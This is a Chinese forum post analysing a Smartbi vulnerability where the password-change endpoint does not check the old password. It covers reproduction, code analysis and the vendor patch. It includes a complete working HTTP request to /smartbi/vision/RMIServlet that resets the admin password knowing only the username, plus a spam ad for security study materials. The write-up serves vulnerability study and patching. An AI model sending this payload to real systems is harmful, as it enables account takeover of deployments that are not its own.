f 网络安全-Smartbi 修改用户密码漏洞 - Powered by qidao123.com技术社区

Smartbi 修改用户密码漏洞

打印 上一主题 下一主题

主题 1876|帖子 1876|积分 5630

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

x
漏洞简介

通过查看 Smartbi 的补丁包信息,发现存在漏洞在某种特定情况下修改用户的密码,进行简单的复现和分析
[img=720,474.219]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559123.png[/img]​
漏洞复现

在页面上修改密码时,需要知道原本的用户对应的密码
[img=720,276.36068237205524]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559125.png[/img]
[img=720,292.313756405203]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559126.png[/img]​
[img=720,295.6465342521281]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559127.png[/img]​
直接构造这样的数据包,就不需要知道原本的密码,知道用户名就可以修改密码
  1. POST /smartbi/vision/RMIServlet HTTP/1.1
  2. Host: 192.168.222.133:18080
  3. Content-Length: 73
  4. Cache-Control: max-age=0
  5. If-Modified-Since: 0
  6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
  7. Content-Type: application/x-www-form-urlencoded;charset=UTF-8
  8. Accept: */*
  9. Origin: http://192.168.222.133:18080
  10. Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
  11. Accept-Encoding: gzip, deflate
  12. Accept-Language: zh-CN,zh;q=0.9
  13. Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
  14. Connection: close
  15. className=UserService&methodName=changePasswordEx&params=["admin","","1"]
复制代码
[img=720,321.1875]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559128.png[/img]​​[img=720,387.5067024128686]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559129.png[/img]​
漏洞分析

smartbi.usermanager.ILocalUserManagerModule#changePasswordEx​
[img=720,37.2206781545303]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559130.png[/img]​
smartbi.usermanager.UserManagerModule#changePasswordEx​
[img=720,223.09859154929578]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559131.png[/img]
 
修改密码的操作虽然获取了用户名 原本的密码 修改后的新密码,但是对原本的密码并没有做任何校验处理
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
userId 是根据传入的用户名查询到的
smartbi.usermanager.UserManagerModule#updateUserEx​
[img=720,49.665187575635336]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559132.png[/img]smartbi.usermanager.UserManagerModule#updateUserExtend​
[img=720,146.61290322580646]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559134.png[/img]​
漏洞修复

上传补丁包后再发送数据包,发现被拦截
[img=720,322.53521126760563]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559135.png[/img]​

[img=720,196.17391304347825]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559136.png[/img]​
[img=720,193.8348922326149]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202308151559137.png[/img]​
匹配到对应的类名和方法就结束执行
更多网安技能的在线实操练习,请点击这里>>
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
继续阅读请点击广告
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

用多少眼泪才能让你相信

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表